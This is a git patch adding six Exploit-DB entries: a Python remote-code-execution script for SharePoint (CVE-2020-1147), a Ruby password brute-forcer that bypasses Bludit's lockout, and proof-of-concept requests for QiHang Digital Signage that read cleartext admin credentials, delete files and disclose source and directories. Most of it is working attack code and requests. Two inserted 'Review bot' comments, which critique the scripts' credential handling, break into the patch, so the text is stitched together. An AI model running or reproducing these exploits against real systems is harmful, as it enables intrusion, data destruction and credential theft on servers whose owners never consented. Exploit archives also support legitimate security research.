From 81f468c9ee582c61ade08d9875d1854b050ef983 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 18 Aug 2020 05:01:50 +0000
Subject: [PATCH] DB: 2020-08-18

6 changes to exploits/shellcodes

Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass
Microsoft SharePoint Server 2019 - Remote Code Execution
QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure
QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion
QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure
QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)
---
 exploits/aspx/webapps/48747.py | 254 ++++++++++++++++++++++++++++
 exploits/hardware/webapps/48748.txt | 48 ++++++
 exploits/hardware/webapps/48749.txt | 58 +++++++
 exploits/hardware/webapps/48750.txt | 222 ++++++++++++++++++++++++
 exploits/hardware/webapps/48751.txt | 138 +++++++++++++++
 exploits/php/webapps/48746.rb | 92 ++++++++++
 files_exploits.csv | 6 +
 7 files changed, 818 insertions(+)
 create mode 100755 exploits/aspx/webapps/48747.py
 create mode 100644 exploits/hardware/webapps/48748.txt
 create mode 100644 exploits/hardware/webapps/48749.txt
 create mode 100644 exploits/hardware/webapps/48750.txt
 create mode 100644 exploits/hardware/webapps/48751.txt
 create mode 100755 exploits/php/webapps/48746.rb

diff --git a/exploits/aspx/webapps/48747.py b/exploits/aspx/webapps/48747.py
new file mode 100755
index 000000000..b1225b54a
--- /dev/null
+++ b/exploits/aspx/webapps/48747.py
@@ -0,0 +1,254 @@ +# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution +# Google Dork: inurl:quicklinks.aspx +# Date: 2020-08-14 +# Exploit Author: West Shepherd +# Vendor Homepage: https://www.microsoft.com +# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service +# Pack 2, SharePoint Server 2019 +# Tested on: Windows 2016 +# CVE : CVE-2020-1147 +# Credit goes to Steven Seele and Soroush Dalili +# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html + +#!/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from bs4 import BeautifulSoup +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from requests_ntlm import HttpNtlmAuth +from urllib import quote, unquote +import logging + + +class Exploit: + # To generate the gadget use: + # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command" + # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command" + gadget = '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' + control_path_quicklinks = '/_layouts/15/quicklinks.aspx' + control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx' + control_path = control_path_quicklinks + + def __init__( + self, + redirect=False, + proxy_address='', + username='', + domain='', + password='', + target='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.username = '%s\\%s' % (domain, username) + self.target = target + self.password = password + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.headers = {} + self.query_params = { + 'Mode': "Suggestion" + } + 
self.form_values = { + '__viewstate': '', + '__SUGGESTIONSCACHE__': '' + } + self.cookies = {} + self.payload = """\ + + + + + + + + + + + + + + + + + + + + + + + Deserialize + + {GADGET} + + + + + + + +""".replace('{GADGET}', self.gadget) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params, + auth=HttpNtlmAuth(self.username, self.password) + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params, + auth=HttpNtlmAuth(self.username, self.password) + ) + + def parse_page(self, content): + soup = BeautifulSoup(content, 'lxml') + for key, val in self.form_values.iteritems(): + try: + for tag in soup.select('input[name=%s]' % key): + try: + self.form_values[key] = tag['value'] + except Exception as error: + stderr.write('error for key %s error %s\n' % +(key, str(error))) + except Exception as error: + stderr.write('error for selector %s error %s\n' % +(key, str(error))) + return self + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def clean(self, payload): + payload = payload\ + .replace('\n', '')\ + .replace('\r', '') + while ' ' in payload: + payload = payload\ + .replace(' ', ' ') + return payload + + def get_form(self): + url = '%s%s' % (self.target, self.control_path) + resp = self.do_get(url=url, params=self.query_params) + self.parse_page(content=resp.content) + 
return resp + + def send_payload(self): + url = '%s%s' % (self.target, self.control_path) + # self.get_form() + self.headers['Content-Type'] = 'application/x-www-form-urlencoded' + self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload) + self.form_values['__viewstate'] = '' + resp = self.do_post(url=url, params=self.query_params, +data=self.form_values) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, +description='CVE-2020-1147 SharePoint exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com ') + parser.add_argument('-username', action='store', default='', +help='Username to use: first.last') + parser.add_argument('-domain', action='store', default='', +help='User domain to use: domain.local') + parser.add_argument('-password', action='store', default='', +help='Password to use: Summer2020') + parser.add_argument('-both', action='store', default=False, +help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): +False') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + username=options.username, + domain=options.domain, + password=options.password, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s username %s domain %s password %s +debug %s proxy %s\n' % ( + options.target, options.username, options.domain, +options.password, options.debug, options.proxy + )) + + result = exp.send_payload() + stdout.write('Response: %d\n' % result.status_code) + if 'MicrosoftSharePointTeamServices' in result.headers: + stdout.write('Version: %s\n' % +result.headers['MicrosoftSharePointTeamServices']) + if options.both and 
result.status_code != 200: + exp.control_path = exp.control_path_quicklinksdialogform + stdout.write('Trying alternate page\n') + result = exp.send_payload() + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + stderr.write('error in main %s' % str(error)) + + +Regards, + +West Shepherd +OSWE | OSCE | OSCP | OSWP | CEH | Security+ +West Lee Shepherd, LLC \ No newline at end of file diff --git a/exploits/hardware/webapps/48748.txt b/exploits/hardware/webapps/48748.txt new file mode 100644 index 000000000..ccee75adf --- /dev/null +++ b/exploits/hardware/webapps/48748.txt @@ -0,0 +1,48 @@ +# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure +# Date: 2020-08-12 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.howfor.com +# Tested on: Microsoft Windows Server 2012 R2 Datacenter +# CVE : N/A + +QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure + + +Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. + Guangzhou Hefeng Automation Technology Co., Ltd. +Product web page: http://www.howfor.com +Affected version: 3.0.9.0 + +Summary: Digital Signage Software. + +Desc: The application suffers from clear-text credentials disclosure vulnerability +that allows an unauthenticated attacker to issue a request to an unprotected directory +that hosts an XML file '/xml/User/User.xml' and obtain administrative login information +that allows for a successful authentication bypass attack. + +Tested on: Microsoft Windows Server 2012 R2 Datacenter + Microsoft Windows Server 2003 Enterprise Edition + ASP.NET 4.0.30319 + HowFor Web Server/5.6.0.0 + Microsoft ASP.NET Web QiHang IIS Server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5579 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + + +27.07.2020 + +-- + +$ curl http://192.168.1.1/xml/User/User.xml + + + + + + \ No newline at end of file 
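Review bot: The `stdout.write('target %s username %s domain %s password %s debug %s proxy %s\n' ...)` call beside `exp.debug()` in the `__main__` block prints `options.password` in cleartext, so the operator's domain credential lands in terminal scrollback and any captured output; drop the field, e.g. `stdout.write('target %s username %s domain %s debug %s proxy %s\n' % (options.target, options.username, options.domain, options.debug, options.proxy))`. `do_get` and `do_post` send that same credential through `HttpNtlmAuth` with `verify=False`, and `debug()` raises `HTTPConnection.debuglevel` to 1, which presumably echoes the authentication headers as well. `-debug` and `-both` are declared with `action='store'` and `default=False`, so any supplied value, including the string `False`, is truthy and still switches the credential-printing path on; `action='store_true'` is the usual form.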
diff --git a/exploits/hardware/webapps/48749.txt b/exploits/hardware/webapps/48749.txt
new file mode 100644
index 000000000..afb640765
--- /dev/null
+++ b/exploits/hardware/webapps/48749.txt
@@ -0,0 +1,58 @@ +# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion +# Date: 2020-08-12 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.howfor.com +# Tested on: Microsoft Windows Server 2012 R2 Datacenter +# CVE : N/A + +QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion + + +Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. + Guangzhou Hefeng Automation Technology Co., Ltd. +Product web page: http://www.howfor.com +Affected version: 3.0.9.0 + +Summary: Digital Signage Software. + +Desc: Input passed to the 'data' parameter in 'QH.aspx' for delete action +is not properly sanitised before being used to delete files. This can be +exploited by an unauthenticated attacker to delete files with the permissions +of the web server using their absolute path or via directory traversal +sequences passed within the affected POST parameter. + + +Tested on: Microsoft Windows Server 2012 R2 Datacenter + Microsoft Windows Server 2003 Enterprise Edition + ASP.NET 4.0.30319 + HowFor Web Server/5.6.0.0 + Microsoft ASP.NET Web QiHang IIS Server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5580 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5580.php + + +27.07.2020 + +-- + + +POST /QH.aspx HTTP/1.1 +Host: 192.168.1.74:8090 +Content-Length: 105 +User-Agent: Eraser +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Origin: http://192.168.1.74:8090 +Referer: http://192.168.1.74:8090/index.htm +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +responderId=ResourceNewResponder&action=delete&data=["/opt/resources/Billboard.jpg"] \ No newline at end of file diff --git a/exploits/hardware/webapps/48750.txt b/exploits/hardware/webapps/48750.txt new file mode 100644 index 000000000..71d7bdf1a --- /dev/null 
+++ b/exploits/hardware/webapps/48750.txt 
@@ -0,0 +1,222 @@ +# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure +# Date: 2020-08-12 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.howfor.com +# Tested on: Microsoft Windows Server 2012 R2 Datacenter +# CVE : N/A + +QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability + + +Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. + Guangzhou Hefeng Automation Technology Co., Ltd. +Product web page: http://www.howfor.com +Affected version: 3.0.9.0 + +Summary: Digital Signage Software. + +Desc: The application suffers from an unauthenticated file disclosure +vulnerability when input passed thru the 'filename' parameter when +using the download action or thru 'path' parameter when using the +getAll action is not properly verified before being used. This can +be exploited to disclose contents of files and directories from local +resources. + +Tested on: Microsoft Windows Server 2012 R2 Datacenter + Microsoft Windows Server 2003 Enterprise Edition + ASP.NET 4.0.30319 + HowFor Web Server/5.6.0.0 + Microsoft ASP.NET Web QiHang IIS Server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5581 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php + + +27.07.2020 + +-- + + +Source code disclosure PoC: +--------------------------- + +GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1 +Host: 192.168.1.74:8090 +User-Agent: lfi_test.wrapper/2.9 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +-- + +HTTP/1.1 200 OK +Server: HowFor Web Server/5.6.0.0 +Date: Sun, 26 Jul 2020 22:49:08 GMT +X-AspNet-Version: 4.0.30319 +Content-Disposition: attachment;filename=QH.aspx +Set-Cookie: 
ASP.NET_SessionId=f0xji5cazmbzdygcr5g3qr03; path=/; HttpOnly +Cache-Control: no-cache +Pragma: no-cache +Expires: -1 +Content-Type: application/zip +Content-Length: 463 +Connection: Close + +<%@ Page Language="C#" ValidateRequest="false" AutoEventWireup="true" CodeBehind="QH.aspx.cs" Inherits="QiHang.Media.Web.QH" %> + + + + + + + + +
+
+ +
+
+ + + + +Arbitrary file read: +-------------------- + +http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax +http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=view&fileName=.%2fWeb.config + + +Directory contents disclosure: +------------------------------ + +POST /QH.aspx HTTP/1.1 +Host: 192.168.1.74:8090 +Content-Length: 62 +User-Agent: lfi_test.wrapper/2.9 +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +responderId=ResourceNewResponder&action=getAll&path=&fileName= + +-- + +HTTP/1.1 200 OK +Server: HowFor Web Server/5.6.0.0 +Date: Tue, 28 Jul 2020 23:51:13 GMT +X-AspNet-Version: 4.0.30319 +Set-Cookie: ASP.NET_SessionId=f0ac1jyifcacvufnpptduv1f; path=/; HttpOnly +Cache-Control: no-cache +Pragma: no-cache +Expires: -1 +Content-Type: text/html; charset=utf-8 +Content-Length: 4680 +Connection: Close + +{ + "first": true, + "second": [ + { + "name": "App_Data", + "type": "folder", + "size": 852992.0, + "uploadTime": new Date( + 1525316885250 + ), + "path": "/App_Data" + }, + { + "name": "bin", + "type": "folder", + "size": 4398172.0, + "uploadTime": new Date( + 1525316885046 + ), +... +... + "name": "xml", + "type": "folder", + "size": 25519.0, + "uploadTime": new Date( + 1525316885234 + ), + "path": "/xml" + }, + { + "name": "default.htm", + "type": ".htm", + "size": 1609.0, + "uploadTime": new Date( + 1523859040000 + ), + "path": "/default.htm" + }, + { + "name": "Global.asax", + "type": ".asax", + "size": 100.0, + "uploadTime": new Date( + 1523859032000 + ), + "path": "/Global.asax" + }, + { + "name": "IIS.dll", + "type": ".dll", + "size": 40960.0, + "uploadTime": new Date( + 1523859036000 + ), +... +... 
+ "path": "/Media.Server.DeamonPlugin.Web.xml" + }, + { + "name": "preview.htm", + "type": ".htm", + "size": 947.0, + "uploadTime": new Date( + 1523859040000 + ), + "path": "/preview.htm" + }, + { + "name": "QH.aspx", + "type": ".aspx", + "size": 463.0, + "uploadTime": new Date( + 1523859030000 + ), + "path": "/QH.aspx" + }, + { + "name": "server.xml", + "type": ".xml", + "size": 206.0, + "uploadTime": new Date( + 1523859034000 + ), + "path": "/server.xml" + }, + { + "name": "Web.config", + "type": ".config", + "size": 2470.0, + "uploadTime": new Date( + 1523859034000 + ), + "path": "/Web.config" + } + ], + "third": 0 +} \ No newline at end of file diff --git a/exploits/hardware/webapps/48751.txt b/exploits/hardware/webapps/48751.txt new file mode 100644 index 000000000..c1ac88ef5 --- /dev/null +++ b/exploits/hardware/webapps/48751.txt @@ -0,0 +1,138 @@ +# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated) +# Date: 2020-08-12 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.howfor.com +# Tested on: Microsoft Windows Server 2012 R2 Datacenter +# CVE : N/A + + + + + + + +
+ +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/48746.rb b/exploits/php/webapps/48746.rb new file mode 100755 index 000000000..587e30929 --- /dev/null +++ b/exploits/php/webapps/48746.rb 
@@ -0,0 +1,92 @@ +#!/usr/bin/env ruby +## Title: Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass +## Author: noraj (Alexandre ZANNI) +## Author website: https://pwn.by/noraj/ +## Date: 2020-08-16 +## Vendor Homepage: https://www.bludit.com/ +## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz +## Version: <= 3.9.2 +## Tested on: Bludit Version 3.9.2 + +# Vulnerability +## Discoverer: Rastating +## Discoverer website: https://rastating.github.io/ +## CVE: CVE-2019-17240 +## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-17240 +## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/ +## Patch: https://github.com/bludit/bludit/pull/1090 + +require 'httpclient' +require 'docopt' + +# dirty workaround to remove this warning: +# Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning. +# see https://github.com/nahi/httpclient/issues/252 +class WebAgent + class Cookie < HTTP::Cookie + def domain + self.original_domain + end + end +end + +def get_csrf(client, login_url) + res = client.get(login_url) + csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0] +end + +def auth_ok?(res) + HTTP::Status.redirect?(res.code) && + %r{/admin/dashboard}.match?(res.headers['Location']) +end + +def bruteforce_auth(client, host, username, wordlist) + login_url = host + '/admin/login' + File.foreach(wordlist).with_index do |password, i| + password = password.chomp + csrf_token = get_csrf(client, login_url) + headers = { + 'X-Forwarded-For' => "#{i}-#{password[..4]}", + } + data = { + 'tokenCSRF' => csrf_token, + 'username' => username, + 'password' => password, + } + puts "[*] Trying password: #{password}" + auth_res = client.post(login_url, data, headers) + if auth_ok?(auth_res) + puts "\n[+] Password found: #{password}" + break + end + end +end + +doc = <<~DOCOPT + Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass + + Usage: + #{__FILE__} -r 
-u -w [--debug] + #{__FILE__} -H | --help + + Options: + -r , --root-url Root URL (base path) including HTTP scheme, port and root folder + -u , --user Username of the admin + -w , --wordlist Path to the wordlist file + --debug Display arguments + -H, --help Show this screen + + Examples: + #{__FILE__} -r http://example.org -u admin -w myWordlist.txt + #{__FILE__} -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txt +DOCOPT + +begin + args = Docopt.docopt(doc) + pp args if args['--debug'] + + clnt = HTTPClient.new + bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--wordlist']) +rescue Docopt::Exit => e + puts e.message +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fa752befb..042716513 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
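Review bot: The `headers` hash in `bruteforce_auth` has no comment explaining why `X-Forwarded-For` is set, and its value `"#{i}-#{password[..4]}"` copies the first five characters of every candidate password into a header that proxies and access logs commonly record. A comment such as `# X-Forwarded-For is varied per request (CVE-2019-17240); the value carries a password prefix and will show up in logs` would make that visible to whoever runs this in an authorized test. `get_csrf` calls `.captures[0]` on the `match` result without a nil check, so a response lacking `tokenCSRF` ends in `NoMethodError` instead of a readable message. For defenders, `POST` requests to `/admin/login` carrying a non-IP `X-Forwarded-For` value are a direct log indicator of this script, and the fix is the patch already referenced in the file header (`https://github.com/bludit/bludit/pull/1090`).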
@@ -42987,3 +42987,9 @@ id,file,description,date,author,type,platform,port
 48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,
 48744,exploits/hardware/webapps/48744.py,"Artica Proxy 4.3.0 - Authentication Bypass",2020-08-13,"Dan Duffy",webapps,hardware,
 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,
+48746,exploits/php/webapps/48746.rb,"Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",2020-08-17,"Alexandre ZANNI",webapps,php,
+48747,exploits/aspx/webapps/48747.py,"Microsoft SharePoint Server 2019 - Remote Code Execution",2020-08-17,"West Shepherd",webapps,aspx,
+48748,exploits/hardware/webapps/48748.txt,"QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure",2020-08-17,LiquidWorm,webapps,hardware,
+48749,exploits/hardware/webapps/48749.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion",2020-08-17,LiquidWorm,webapps,hardware,
+48750,exploits/hardware/webapps/48750.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure",2020-08-17,LiquidWorm,webapps,hardware,
+48751,exploits/hardware/webapps/48751.txt,"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)",2020-08-17,LiquidWorm,webapps,hardware,